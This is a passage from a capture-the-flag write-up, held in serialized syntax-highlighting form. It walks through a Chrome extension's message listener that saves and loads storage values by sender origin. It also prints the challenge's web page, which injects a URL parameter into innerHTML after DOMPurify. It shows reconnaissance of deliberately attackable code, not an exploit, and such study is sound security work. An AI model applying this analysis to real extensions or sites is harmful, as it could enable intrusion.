sender_origin",{"type":33,"tag":128,"props":13888,"children":13889},{"style":312},[13890],{"type":38,"value":5657},{"type":33,"tag":128,"props":13892,"children":13893},{"style":300},[13894],{"type":38,"value":13061},{"type":33,"tag":128,"props":13896,"children":13897},{"style":135},[13898],{"type":38,"value":13899}," URL",{"type":33,"tag":128,"props":13901,"children":13902},{"style":312},[13903],{"type":38,"value":5566},{"type":33,"tag":128,"props":13905,"children":13906},{"style":306},[13907],{"type":38,"value":13908},"sender",{"type":33,"tag":128,"props":13910,"children":13911},{"style":312},[13912],{"type":38,"value":215},{"type":33,"tag":128,"props":13914,"children":13915},{"style":306},[13916],{"type":38,"value":13917},"tab",{"type":33,"tag":128,"props":13919,"children":13920},{"style":312},[13921],{"type":38,"value":215},{"type":33,"tag":128,"props":13923,"children":13924},{"style":306},[13925],{"type":38,"value":13926},"pendingUrl",{"type":33,"tag":128,"props":13928,"children":13929},{"style":300},[13930],{"type":38,"value":13931}," ??",{"type":33,"tag":128,"props":13933,"children":13934},{"style":306},[13935],{"type":38,"value":13820},{"type":33,"tag":128,"props":13937,"children":13938},{"style":312},[13939],{"type":38,"value":215},{"type":33,"tag":128,"props":13941,"children":13942},{"style":306},[13943],{"type":38,"value":13917},{"type":33,"tag":128,"props":13945,"children":13946},{"style":312},[13947],{"type":38,"value":215},{"type":33,"tag":128,"props":13949,"children":13950},{"style":306},[13951],{"type":38,"value":13952},"url",{"type":33,"tag":128,"props":13954,"children":13955},{"style":312},[13956],{"type":38,"value":6700},{"type":33,"tag":128,"props":13958,"children":13959},{"style":306},[13960],{"type":38,"value":13961},"origin",{"type":33,"tag":128,"props":13963,"children":13964},{"style":312},[13965],{"type":38,"value":5676},{"type":33,"tag":128,"props":13967,"children":13968},{"class":130,"line":1288},[13969,13973,13977,13981,13985,13989,13994,13998,14002,14006],{"type":33,"tag":128,"props":13970,"children":13971},{"style":306},[13972],{"type":38,"value":6880},{"type":33,"tag":128,"props":13974,"children":13975},{"style":312},[13976],{"type":38,"value":215},{"type":33,"tag":128,"props":13978,"children":13979},{"style":135},[13980],{"type":38,"value":13157},{"type":33,"tag":128,"props":13982,"children":13983},{"style":312},[13984],{"type":38,"value":5566},{"type":33,"tag":128,"props":13986,"children":13987},{"style":676},[13988],{"type":38,"value":669},{"type":33,"tag":128,"props":13990,"children":13991},{"style":140},[13992],{"type":38,"value":13993},"Sender Origin: ",{"type":33,"tag":128,"props":13995,"children":13996},{"style":676},[13997],{"type":38,"value":669},{"type":33,"tag":128,"props":13999,"children":14000},{"style":312},[14001],{"type":38,"value":5584},{"type":33,"tag":128,"props":14003,"children":14004},{"style":306},[14005],{"type":38,"value":13886},{"type":33,"tag":128,"props":14007,"children":14008},{"style":312},[14009],{"type":38,"value":5815},{"type":33,"tag":128,"props":14011,"children":14012},{"class":130,"line":1300},[14013,14017,14021,14025,14029,14033,14038,14042,14046,14051],{"type":33,"tag":128,"props":14014,"children":14015},{"style":306},[14016],{"type":38,"value":6880},{"type":33,"tag":128,"props":14018,"children":14019},{"style":312},[14020],{"type":38,"value":215},{"type":33,"tag":128,"props":14022,"children":14023},{"style":135},[14024],{"type":38,"value":13157},{"type":33,"tag":128,"props":14026,"children":14027},{"style":312},[14028],{"type":38,"value":5566},{"type":33,"tag":128,"props":14030,"children":14031},{"style":676},[14032],{"type":38,"value":669},{"type":33,"tag":128,"props":14034,"children":14035},{"style":140},[14036],{"type":38,"value":14037},"Request: ",{"type":33,"tag":128,"props":14039,"children":14040},{"style":676},[14041],{"type":38,"value":669},{"type":33,"tag":128,"props":14043,"children":14044},{"style":312},[14045],{"type":38,"value":5584},{"type":33,"tag":128,"props":14047,"children":14048},{"style":306},[14049],{"type":38,"value":14050}," request",{"type":33,"tag":128,"props":14052,"children":14053},{"style":312},[14054],{"type":38,"value":5815},{"type":33,"tag":128,"props":14056,"children":14057},{"class":130,"line":1313},[14058,14062,14066,14070,14074,14079,14083,14087,14092,14096,14100],{"type":33,"tag":128,"props":14059,"children":14060},{"style":1576},[14061],{"type":38,"value":6625},{"type":33,"tag":128,"props":14063,"children":14064},{"style":312},[14065],{"type":38,"value":2852},{"type":33,"tag":128,"props":14067,"children":14068},{"style":306},[14069],{"type":38,"value":13811},{"type":33,"tag":128,"props":14071,"children":14072},{"style":312},[14073],{"type":38,"value":215},{"type":33,"tag":128,"props":14075,"children":14076},{"style":306},[14077],{"type":38,"value":14078},"type",{"type":33,"tag":128,"props":14080,"children":14081},{"style":300},[14082],{"type":38,"value":13595},{"type":33,"tag":128,"props":14084,"children":14085},{"style":676},[14086],{"type":38,"value":679},{"type":33,"tag":128,"props":14088,"children":14089},{"style":140},[14090],{"type":38,"value":14091},"SAVE",{"type":33,"tag":128,"props":14093,"children":14094},{"style":676},[14095],{"type":38,"value":669},{"type":33,"tag":128,"props":14097,"children":14098},{"style":312},[14099],{"type":38,"value":2966},{"type":33,"tag":128,"props":14101,"children":14102},{"style":312},[14103],{"type":38,"value":762},{"type":33,"tag":128,"props":14105,"children":14106},{"class":130,"line":1327},[14107,14112,14116,14120,14124,14128,14132,14136,14140,14144,14148,14152,14156,14161,14165,14169],{"type":33,"tag":128,"props":14108,"children":14109},{"style":135},[14110],{"type":38,"value":14111}," save",{"type":33,"tag":128,"props":14113,"children":14114},{"style":312},[14115],{"type":38,"value":5566},{"type":33,"tag":128,"props":14117,"children":14118},{"style":306},[14119],{"type":38,"value":13811},{"type":33,"tag":128,"props":14121,"children":14122},{"style":312},[14123],{"type":38,"value":215},{"type":33,"tag":128,"props":14125,"children":14126},{"style":306},[14127],{"type":38,"value":11139},{"type":33,"tag":128,"props":14129,"children":14130},{"style":312},[14131],{"type":38,"value":215},{"type":33,"tag":128,"props":14133,"children":14134},{"style":306},[14135],{"type":38,"value":13022},{"type":33,"tag":128,"props":14137,"children":14138},{"style":312},[14139],{"type":38,"value":5584},{"type":33,"tag":128,"props":14141,"children":14142},{"style":306},[14143],{"type":38,"value":14050},{"type":33,"tag":128,"props":14145,"children":14146},{"style":312},[14147],{"type":38,"value":215},{"type":33,"tag":128,"props":14149,"children":14150},{"style":306},[14151],{"type":38,"value":11139},{"type":33,"tag":128,"props":14153,"children":14154},{"style":312},[14155],{"type":38,"value":215},{"type":33,"tag":128,"props":14157,"children":14158},{"style":306},[14159],{"type":38,"value":14160},"value",{"type":33,"tag":128,"props":14162,"children":14163},{"style":312},[14164],{"type":38,"value":5584},{"type":33,"tag":128,"props":14166,"children":14167},{"style":306},[14168],{"type":38,"value":13886},{"type":33,"tag":128,"props":14170,"children":14171},{"style":312},[14172],{"type":38,"value":2427},{"type":33,"tag":128,"props":14174,"children":14175},{"class":130,"line":11196},[14176,14181,14186,14190,14195,14199,14203,14207,14211],{"type":33,"tag":128,"props":14177,"children":14178},{"style":312},[14179],{"type":38,"value":14180}," .",{"type":33,"tag":128,"props":14182,"children":14183},{"style":135},[14184],{"type":38,"value":14185},"then",{"type":33,"tag":128,"props":14187,"children":14188},{"style":312},[14189],{"type":38,"value":5566},{"type":33,"tag":128,"props":14191,"children":14192},{"style":306},[14193],{"type":38,"value":14194},"response",{"type":33,"tag":128,"props":14196,"children":14197},{"style":312},[14198],{"type":38,"value":5625},{"type":33,"tag":128,"props":14200,"children":14201},{"style":135},[14202],{"type":38,"value":13829},{"type":33,"tag":128,"props":14204,"children":14205},{"style":312},[14206],{"type":38,"value":5566},{"type":33,"tag":128,"props":14208,"children":14209},{"style":306},[14210],{"type":38,"value":14194},{"type":33,"tag":128,"props":14212,"children":14213},{"style":312},[14214],{"type":38,"value":2459},{"type":33,"tag":128,"props":14216,"children":14217},{"class":130,"line":11204},[14218,14222,14227,14231,14235,14239,14243,14247,14252],{"type":33,"tag":128,"props":14219,"children":14220},{"style":312},[14221],{"type":38,"value":14180},{"type":33,"tag":128,"props":14223,"children":14224},{"style":135},[14225],{"type":38,"value":14226},"catch",{"type":33,"tag":128,"props":14228,"children":14229},{"style":312},[14230],{"type":38,"value":5566},{"type":33,"tag":128,"props":14232,"children":14233},{"style":306},[14234],{"type":38,"value":6889},{"type":33,"tag":128,"props":14236,"children":14237},{"style":312},[14238],{"type":38,"value":5625},{"type":33,"tag":128,"props":14240,"children":14241},{"style":135},[14242],{"type":38,"value":13829},{"type":33,"tag":128,"props":14244,"children":14245},{"style":312},[14246],{"type":38,"value":5836},{"type":33,"tag":128,"props":14248,"children":14249},{"style":306},[14250],{"type":38,"value":14251}," error",{"type":33,"tag":128,"props":14253,"children":14254},{"style":312},[14255],{"type":38,"value":14256}," }));\n",{"type":33,"tag":128,"props":14258,"children":14259},{"class":130,"line":11213},[14260,14265,14270,14275,14279,14283,14287,14291,14295,14299,14304,14308,14312],{"type":33,"tag":128,"props":14261,"children":14262},{"style":312},[14263],{"type":38,"value":14264}," }",{"type":33,"tag":128,"props":14266,"children":14267},{"style":1576},[14268],{"type":38,"value":14269}," else",{"type":33,"tag":128,"props":14271,"children":14272},{"style":1576},[14273],{"type":38,"value":14274}," if",{"type":33,"tag":128,"props":14276,"children":14277},{"style":312},[14278],{"type":38,"value":2852},{"type":33,"tag":128,"props":14280,"children":14281},{"style":306},[14282],{"type":38,"value":13811},{"type":33,"tag":128,"props":14284,"children":14285},{"style":312},[14286],{"type":38,"value":215},{"type":33,"tag":128,"props":14288,"children":14289},{"style":306},[14290],{"type":38,"value":14078},{"type":33,"tag":128,"props":14292,"children":14293},{"style":300},[14294],{"type":38,"value":13595},{"type":33,"tag":128,"props":14296,"children":14297},{"style":676},[14298],{"type":38,"value":679},{"type":33,"tag":128,"props":14300,"children":14301},{"style":140},[14302],{"type":38,"value":14303},"LOAD",{"type":33,"tag":128,"props":14305,"children":14306},{"style":676},[14307],{"type":38,"value":669},{"type":33,"tag":128,"props":14309,"children":14310},{"style":312},[14311],{"type":38,"value":2966},{"type":33,"tag":128,"props":14313,"children":14314},{"style":312},[14315],{"type":38,"value":762},{"type":33,"tag":128,"props":14317,"children":14318},{"class":130,"line":11250},[14319,14324,14328,14332,14336,14340,14344,14348,14352,14356],{"type":33,"tag":128,"props":14320,"children":14321},{"style":135},[14322],{"type":38,"value":14323}," load",{"type":33,"tag":128,"props":14325,"children":14326},{"style":312},[14327],{"type":38,"value":5566},{"type":33,"tag":128,"props":14329,"children":14330},{"style":306},[14331],{"type":38,"value":13811},{"type":33,"tag":128,"props":14333,"children":14334},{"style":312},[14335],{"type":38,"value":215},{"type":33,"tag":128,"props":14337,"children":14338},{"style":306},[14339],{"type":38,"value":11139},{"type":33,"tag":128,"props":14341,"children":14342},{"style":312},[14343],{"type":38,"value":215},{"type":33,"tag":128,"props":14345,"children":14346},{"style":306},[14347],{"type":38,"value":13022},{"type":33,"tag":128,"props":14349,"children":14350},{"style":312},[14351],{"type":38,"value":5584},{"type":33,"tag":128,"props":14353,"children":14354},{"style":306},[14355],{"type":38,"value":13886},{"type":33,"tag":128,"props":14357,"children":14358},{"style":312},[14359],{"type":38,"value":2427},{"type":33,"tag":128,"props":14361,"children":14362},{"class":130,"line":11270},[14363,14367,14371,14375,14379,14383,14387,14391,14395],{"type":33,"tag":128,"props":14364,"children":14365},{"style":312},[14366],{"type":38,"value":14180},{"type":33,"tag":128,"props":14368,"children":14369},{"style":135},[14370],{"type":38,"value":14185},{"type":33,"tag":128,"props":14372,"children":14373},{"style":312},[14374],{"type":38,"value":5566},{"type":33,"tag":128,"props":14376,"children":14377},{"style":306},[14378],{"type":38,"value":14194},{"type":33,"tag":128,"props":14380,"children":14381},{"style":312},[14382],{"type":38,"value":5625},{"type":33,"tag":128,"props":14384,"children":14385},{"style":135},[14386],{"type":38,"value":13829},{"type":33,"tag":128,"props":14388,"children":14389},{"style":312},[14390],{"type":38,"value":5566},{"type":33,"tag":128,"props":14392,"children":14393},{"style":306},[14394],{"type":38,"value":14194},{"type":33,"tag":128,"props":14396,"children":14397},{"style":312},[14398],{"type":38,"value":2459},{"type":33,"tag":128,"props":14400,"children":14401},{"class":130,"line":11278},[14402,14406,14410,14414,14418,14422,14426,14430,14434],{"type":33,"tag":128,"props":14403,"children":14404},{"style":312},[14405],{"type":38,"value":14180},{"type":33,"tag":128,"props":14407,"children":14408},{"style":135},[14409],{"type":38,"value":14226},{"type":33,"tag":128,"props":14411,"children":14412},{"style":312},[14413],{"type":38,"value":5566},{"type":33,"tag":128,"props":14415,"children":14416},{"style":306},[14417],{"type":38,"value":6889},{"type":33,"tag":128,"props":14419,"children":14420},{"style":312},[14421],{"type":38,"value":5625},{"type":33,"tag":128,"props":14423,"children":14424},{"style":135},[14425],{"type":38,"value":13829},{"type":33,"tag":128,"props":14427,"children":14428},{"style":312},[14429],{"type":38,"value":5836},{"type":33,"tag":128,"props":14431,"children":14432},{"style":306},[14433],{"type":38,"value":14251},{"type":33,"tag":128,"props":14435,"children":14436},{"style":312},[14437],{"type":38,"value":14256},{"type":33,"tag":128,"props":14439,"children":14440},{"class":130,"line":11334},[14441],{"type":33,"tag":128,"props":14442,"children":14443},{"style":312},[14444],{"type":38,"value":6760},{"type":33,"tag":128,"props":14446,"children":14447},{"class":130,"line":11375},[14448],{"type":33,"tag":128,"props":14449,"children":14450},{"style":312},[14451],{"type":38,"value":13321},{"type":33,"tag":128,"props":14453,"children":14454},{"class":130,"line":11383},[14455,14459,14463],{"type":33,"tag":128,"props":14456,"children":14457},{"style":1576},[14458],{"type":38,"value":13056},{"type":33,"tag":128,"props":14460,"children":14461},{"style":1576},[14462],{"type":38,"value":5850},{"type":33,"tag":128,"props":14464,"children":14465},{"style":312},[14466],{"type":38,"value":5676},{"type":33,"tag":128,"props":14468,"children":14469},{"class":130,"line":11392},[14470],{"type":33,"tag":128,"props":14471,"children":14472},{"style":312},[14473],{"type":38,"value":5902},{"type":33,"tag":47,"props":14475,"children":14476},{},[14477,14479,14485],{"type":38,"value":14478},"We can see the call to the function ",{"type":33,"tag":105,"props":14480,"children":14482},{"className":14481},[],[14483],{"type":38,"value":14484},"chrome.runtime.onMessage.addListener",{"type":38,"value":14486}," which will listen for received events.",{"type":33,"tag":47,"props":14488,"children":14489},{},[14490,14492,14497,14498,14503],{"type":38,"value":14491},"Depending on the event ",{"type":33,"tag":105,"props":14493,"children":14495},{"className":14494},[],[14496],{"type":38,"value":14091},{"type":38,"value":6361},{"type":33,"tag":105,"props":14499,"children":14501},{"className":14500},[],[14502],{"type":38,"value":14303},{"type":38,"value":14504},", we will have different processes.",{"type":33,"tag":88,"props":14506,"children":14508},{"id":14507},"chrome-api",[14509],{"type":38,"value":14510},"Chrome API",{"type":33,"tag":47,"props":14512,"children":14513},{},[14514],{"type":38,"value":14515},"Chrome extensions (and most other modern browser extensions) use the WebExtensions API, a standardized API that gives access to browser tabs, cookies, history, storage, and more.",{"type":33,"tag":47,"props":14517,"children":14518},{},[14519],{"type":38,"value":14520},"As you saw in the previous chapter, we can see the call to the chrome object in the background script, which will interact with Chrome's cache using chrome.storage.local.",{"type":33,"tag":40,"props":14522,"children":14524},{"id":14523},"foothold-and-defintion-of-the-assets",[14525],{"type":38,"value":14526},"FootHold and defintion of the assets",{"type":33,"tag":81,"props":14528,"children":14530},{"id":14529},"web-service",[14531],{"type":38,"value":14532},"Web service:",{"type":33,"tag":47,"props":14534,"children":14535},{},[14536],{"type":38,"value":14537},"The web service is a simple page with a text input and a display below.",{"type":33,"tag":75,"props":14539,"children":14542},{"imgSrc":14540,":width":14541},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1731266140/writeups/shikanoko/webapp_chrome.webp","450",[],{"type":33,"tag":114,"props":14544,"children":14545},{"lang":5929},[14546],{"type":33,"tag":119,"props":14547,"children":14549},{"className":5933,"code":14548,"language":5929,"meta":8,"style":8},"\u003C!DOCTYPE html>\n\u003Chtml lang=\"en\">\n\n\u003Chead>\n \u003Cmeta charset=\"UTF-8\">\n \u003Cmeta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n \u003Ctitle>Shinanoko Website\u003C/title>\n\u003C/head>\n\n\u003Cbody>\n \u003Ch1>Berotak Nokotan\u003C/h1>\n \u003Cform action=\"/\">\n \u003Cinput type=\"text\" name=\"html\" placeholder=\"Enter HTML content\">\n \u003Cinput type=\"submit\">\n \u003C/form>\n\n \u003Cdiv class=\"output\">\u003C/div>\n \u003Cscript src=\"https://unpkg.com/dompurify@latest/dist/purify.min.js\">\u003C/script>\n \u003Cscript>\n const url = new URL(location.href);\n const html = url.searchParams.get('html');\n if (html) {\n document.querySelector('.output').innerHTML = DOMPurify.sanitize(html);\n }\n \u003C/script>\n\u003C/body>\n\n\u003C/html>\n\n",[14550],{"type":33,"tag":105,"props":14551,"children":14552},{"__ignoreMap":8},[14553,14575,14612,14619,14635,14673,14732,14764,14779,14786,14801,14833,14870,14950,14986,15002,15009,15053,15099,15114,15160,15216,15240,15311,15319,15334,15349,15356],{"type":33,"tag":128,"props":14554,"children":14555},{"class":130,"line":131},[14556,14561,14566,14571],{"type":33,"tag":128,"props":14557,"children":14558},{"style":312},[14559],{"type":38,"value":14560},"\u003C!",{"type":33,"tag":128,"props":14562,"children":14563},{"style":1576},[14564],{"type":38,"value":14565},"DOCTYPE",{"type":33,"tag":128,"props":14567,"children":14568},{"style":306},[14569],{"type":38,"value":14570}," html",{"type":33,"tag":128,"props":14572,"children":14573},{"style":312},[14574],{"type":38,"value":6097},{"type":33,"tag":128,"props":14576,"children":14577},{"class":130,"line":362},[14578,14582,14586,14591,14595,14599,14604,14608],{"type":33,"tag":128,"props":14579,"children":14580},{"style":312},[14581],{"type":38,"value":5977},{"type":33,"tag":128,"props":14583,"children":14584},{"style":1576},[14585],{"type":38,"value":5929},{"type":33,"tag":128,"props":14587,"children":14588},{"style":306},[14589],{"type":38,"value":14590}," lang",{"type":33,"tag":128,"props":14592,"children":14593},{"style":312},[14594],{"type":38,"value":315},{"type":33,"tag":128,"props":14596,"children":14597},{"style":676},[14598],{"type":38,"value":669},{"type":33,"tag":128,"props":14600,"children":14601},{"style":140},[14602],{"type":38,"value":14603},"en",{"type":33,"tag":128,"props":14605,"children":14606},{"style":676},[14607],{"type":38,"value":669},{"type":33,"tag":128,"props":14609,"children":14610},{"style":312},[14611],{"type":38,"value":6097},{"type":33,"tag":128,"props":14613,"children":14614},{"class":130,"line":403},[14615],{"type":33,"tag":128,"props":14616,"children":14617},{"emptyLinePlaceholder":896},[14618],{"type":38,"value":899},{"type":33,"tag":128,"props":14620,"children":14621},{"class":130,"line":739},[14622,14626,14631],{"type":33,"tag":128,"props":14623,"children":14624},{"style":312},[14625],{"type":38,"value":5977},{"type":33,"tag":128,"props":14627,"children":14628},{"style":1576},[14629],{"type":38,"value":14630},"head",{"type":33,"tag":128,"props":14632,"children":14633},{"style":312},[14634],{"type":38,"value":6097},{"type":33,"tag":128,"props":14636,"children":14637},{"class":130,"line":765},[14638,14642,14647,14652,14656,14660,14665,14669],{"type":33,"tag":128,"props":14639,"children":14640},{"style":312},[14641],{"type":38,"value":6105},{"type":33,"tag":128,"props":14643,"children":14644},{"style":1576},[14645],{"type":38,"value":14646},"meta",{"type":33,"tag":128,"props":14648,"children":14649},{"style":306},[14650],{"type":38,"value":14651}," charset",{"type":33,"tag":128,"props":14653,"children":14654},{"style":312},[14655],{"type":38,"value":315},{"type":33,"tag":128,"props":14657,"children":14658},{"style":676},[14659],{"type":38,"value":669},{"type":33,"tag":128,"props":14661,"children":14662},{"style":140},[14663],{"type":38,"value":14664},"UTF-8",{"type":33,"tag":128,"props":14666,"children":14667},{"style":676},[14668],{"type":38,"value":669},{"type":33,"tag":128,"props":14670,"children":14671},{"style":312},[14672],{"type":38,"value":6097},{"type":33,"tag":128,"props":14674,"children":14675},{"class":130,"line":804},[14676,14680,14684,14689,14693,14697,14702,14706,14711,14715,14719,14724,14728],{"type":33,"tag":128,"props":14677,"children":14678},{"style":312},[14679],{"type":38,"value":6105},{"type":33,"tag":128,"props":14681,"children":14682},{"style":1576},[14683],{"type":38,"value":14646},{"type":33,"tag":128,"props":14685,"children":14686},{"style":306},[14687],{"type":38,"value":14688}," name",{"type":33,"tag":128,"props":14690,"children":14691},{"style":312},[14692],{"type":38,"value":315},{"type":33,"tag":128,"props":14694,"children":14695},{"style":676},[14696],{"type":38,"value":669},{"type":33,"tag":128,"props":14698,"children":14699},{"style":140},[14700],{"type":38,"value":14701},"viewport",{"type":33,"tag":128,"props":14703,"children":14704},{"style":676},[14705],{"type":38,"value":669},{"type":33,"tag":128,"props":14707,"children":14708},{"style":306},[14709],{"type":38,"value":14710}," content",{"type":33,"tag":128,"props":14712,"children":14713},{"style":312},[14714],{"type":38,"value":315},{"type":33,"tag":128,"props":14716,"children":14717},{"style":676},[14718],{"type":38,"value":669},{"type":33,"tag":128,"props":14720,"children":14721},{"style":140},[14722],{"type":38,"value":14723},"width=device-width, initial-scale=1.0",{"type":33,"tag":128,"props":14725,"children":14726},{"style":676},[14727],{"type":38,"value":669},{"type":33,"tag":128,"props":14729,"children":14730},{"style":312},[14731],{"type":38,"value":6097},{"type":33,"tag":128,"props":14733,"children":14734},{"class":130,"line":839},[14735,14739,14743,14747,14752,14756,14760],{"type":33,"tag":128,"props":14736,"children":14737},{"style":312},[14738],{"type":38,"value":6105},{"type":33,"tag":128,"props":14740,"children":14741},{"style":1576},[14742],{"type":38,"value":776},{"type":33,"tag":128,"props":14744,"children":14745},{"style":312},[14746],{"type":38,"value":6054},{"type":33,"tag":128,"props":14748,"children":14749},{"style":323},[14750],{"type":38,"value":14751},"Shinanoko Website",{"type":33,"tag":128,"props":14753,"children":14754},{"style":312},[14755],{"type":38,"value":6190},{"type":33,"tag":128,"props":14757,"children":14758},{"style":1576},[14759],{"type":38,"value":776},{"type":33,"tag":128,"props":14761,"children":14762},{"style":312},[14763],{"type":38,"value":6097},{"type":33,"tag":128,"props":14765,"children":14766},{"class":130,"line":848},[14767,14771,14775],{"type":33,"tag":128,"props":14768,"children":14769},{"style":312},[14770],{"type":38,"value":6190},{"type":33,"tag":128,"props":14772,"children":14773},{"style":1576},[14774],{"type":38,"value":14630},{"type":33,"tag":128,"props":14776,"children":14777},{"style":312},[14778],{"type":38,"value":6097},{"type":33,"tag":128,"props":14780,"children":14781},{"class":130,"line":976},[14782],{"type":33,"tag":128,"props":14783,"children":14784},{"emptyLinePlaceholder":896},[14785],{"type":38,"value":899},{"type":33,"tag":128,"props":14787,"children":14788},{"class":130,"line":988},[14789,14793,14797],{"type":33,"tag":128,"props":14790,"children":14791},{"style":312},[14792],{"type":38,"value":5977},{"type":33,"tag":128,"props":14794,"children":14795},{"style":1576},[14796],{"type":38,"value":5671},{"type":33,"tag":128,"props":14798,"children":14799},{"style":312},[14800],{"type":38,"value":6097},{"type":33,"tag":128,"props":14802,"children":14803},{"class":130,"line":1001},[14804,14808,14812,14816,14821,14825,14829],{"type":33,"tag":128,"props":14805,"children":14806},{"style":312},[14807],{"type":38,"value":6105},{"type":33,"tag":128,"props":14809,"children":14810},{"style":1576},[14811],{"type":38,"value":34},{"type":33,"tag":128,"props":14813,"children":14814},{"style":312},[14815],{"type":38,"value":6054},{"type":33,"tag":128,"props":14817,"children":14818},{"style":323},[14819],{"type":38,"value":14820},"Berotak Nokotan",{"type":33,"tag":128,"props":14822,"children":14823},{"style":312},[14824],{"type":38,"value":6190},{"type":33,"tag":128,"props":14826,"children":14827},{"style":1576},[14828],{"type":38,"value":34},{"type":33,"tag":128,"props":14830,"children":14831},{"style":312},[14832],{"type":38,"value":6097},{"type":33,"tag":128,"props":14834,"children":14835},{"class":130,"line":1014},[14836,14840,14845,14850,14854,14858,14862,14866],{"type":33,"tag":128,"props":14837,"children":14838},{"style":312},[14839],{"type":38,"value":6105},{"type":33,"tag":128,"props":14841,"children":14842},{"style":1576},[14843],{"type":38,"value":14844},"form",{"type":33,"tag":128,"props":14846,"children":14847},{"style":306},[14848],{"type":38,"value":14849}," action",{"type":33,"tag":128,"props":14851,"children":14852},{"style":312},[14853],{"type":38,"value":315},{"type":33,"tag":128,"props":14855,"children":14856},{"style":676},[14857],{"type":38,"value":669},{"type":33,"tag":128,"props":14859,"children":14860},{"style":140},[14861],{"type":38,"value":7367},{"type":33,"tag":128,"props":14863,"children":14864},{"style":676},[14865],{"type":38,"value":669},{"type":33,"tag":128,"props":14867,"children":14868},{"style":312},[14869],{"type":38,"value":6097},{"type":33,"tag":128,"props":14871,"children":14872},{"class":130,"line":1026},[14873,14878,14883,14888,14892,14896,14900,14904,14908,14912,14916,14920,14924,14929,14933,14937,14942,14946],{"type":33,"tag":128,"props":14874,"children":14875},{"style":312},[14876],{"type":38,"value":14877}," \u003C",{"type":33,"tag":128,"props":14879,"children":14880},{"style":1576},[14881],{"type":38,"value":14882},"input",{"type":33,"tag":128,"props":14884,"children":14885},{"style":306},[14886],{"type":38,"value":14887}," type",{"type":33,"tag":128,"props":14889,"children":14890},{"style":312},[14891],{"type":38,"value":315},{"type":33,"tag":128,"props":14893,"children":14894},{"style":676},[14895],{"type":38,"value":669},{"type":33,"tag":128,"props":14897,"children":14898},{"style":140},[14899],{"type":38,"value":38},{"type":33,"tag":128,"props":14901,"children":14902},{"style":676},[14903],{"type":38,"value":669},{"type":33,"tag":128,"props":14905,"children":14906},{"style":306},[14907],{"type":38,"value":14688},{"type":33,"tag":128,"props":14909,"children":14910},{"style":312},[14911],{"type":38,"value":315},{"type":33,"tag":128,"props":14913,"children":14914},{"style":676},[14915],{"type":38,"value":669},{"type":33,"tag":128,"props":14917,"children":14918},{"style":140},[14919],{"type":38,"value":5929},{"type":33,"tag":128,"props":14921,"children":14922},{"style":676},[14923],{"type":38,"value":669},{"type":33,"tag":128,"props":14925,"children":14926},{"style":306},[14927],{"type":38,"value":14928}," placeholder",{"type":33,"tag":128,"props":14930,"children":14931},{"style":312},[14932],{"type":38,"value":315},{"type":33,"tag":128,"props":14934,"children":14935},{"style":676},[14936],{"type":38,"value":669},{"type":33,"tag":128,"props":14938,"children":14939},{"style":140},[14940],{"type":38,"value":14941},"Enter HTML content",{"type":33,"tag":128,"props":14943,"children":14944},{"style":676},[14945],{"type":38,"value":669},{"type":33,"tag":128,"props":14947,"children":14948},{"style":312},[14949],{"type":38,"value":6097},{"type":33,"tag":128,"props":14951,"children":14952},{"class":130,"line":1038},[14953,14957,14961,14965,14969,14973,14978,14982],{"type":33,"tag":128,"props":14954,"children":14955},{"style":312},[14956],{"type":38,"value":14877},{"type":33,"tag":128,"props":14958,"children":14959},{"style":1576},[14960],{"type":38,"value":14882},{"type":33,"tag":128,"props":14962,"children":14963},{"style":306},[14964],{"type":38,"value":14887},{"type":33,"tag":128,"props":14966,"children":14967},{"style":312},[14968],{"type":38,"value":315},{"type":33,"tag":128,"props":14970,"children":14971},{"style":676},[14972],{"type":38,"value":669},{"type":33,"tag":128,"props":14974,"children":14975},{"style":140},[14976],{"type":38,"value":14977},"submit",{"type":33,"tag":128,"props":14979,"children":14980},{"style":676},[14981],{"type":38,"value":669},{"type":33,"tag":128,"props":14983,"children":14984},{"style":312},[14985],{"type":38,"value":6097},{"type":33,"tag":128,"props":14987,"children":14988},{"class":130,"line":1051},[14989,14994,14998],{"type":33,"tag":128,"props":14990,"children":14991},{"style":312},[14992],{"type":38,"value":14993}," \u003C/",{"type":33,"tag":128,"props":14995,"children":14996},{"style":1576},[14997],{"type":38,"value":14844},{"type":33,"tag":128,"props":14999,"children":15000},{"style":312},[15001],{"type":38,"value":6097},{"type":33,"tag":128,"props":15003,"children":15004},{"class":130,"line":1063},[15005],{"type":33,"tag":128,"props":15006,"children":15007},{"emptyLinePlaceholder":896},[15008],{"type":38,"value":899},{"type":33,"tag":128,"props":15010,"children":15011},{"class":130,"line":1076},[15012,15016,15020,15024,15028,15032,15037,15041,15045,15049],{"type":33,"tag":128,"props":15013,"children":15014},{"style":312},[15015],{"type":38,"value":6105},{"type":33,"tag":128,"props":15017,"children":15018},{"style":1576},[15019],{"type":38,"value":5982},{"type":33,"tag":128,"props":15021,"children":15022},{"style":306},[15023],{"type":38,"value":6009},{"type":33,"tag":128,"props":15025,"children":15026},{"style":312},[15027],{"type":38,"value":315},{"type":33,"tag":128,"props":15029,"children":15030},{"style":676},[15031],{"type":38,"value":669},{"type":33,"tag":128,"props":15033,"children":15034},{"style":140},[15035],{"type":38,"value":15036},"output",{"type":33,"tag":128,"props":15038,"children":15039},{"style":676},[15040],{"type":38,"value":669},{"type":33,"tag":128,"props":15042,"children":15043},{"style":312},[15044],{"type":38,"value":6136},{"type":33,"tag":128,"props":15046,"children":15047},{"style":1576},[15048],{"type":38,"value":5982},{"type":33,"tag":128,"props":15050,"children":15051},{"style":312},[15052],{"type":38,"value":6097},{"type":33,"tag":128,"props":15054,"children":15055},{"class":130,"line":1089},[15056,15060,15065,15070,15074,15078,15083,15087,15091,15095],{"type":33,"tag":128,"props":15057,"children":15058},{"style":312},[15059],{"type":38,"value":6105},{"type":33,"tag":128,"props":15061,"children":15062},{"style":1576},[15063],{"type":38,"value":15064},"script",{"type":33,"tag":128,"props":15066,"children":15067},{"style":306},[15068],{"type":38,"value":15069}," 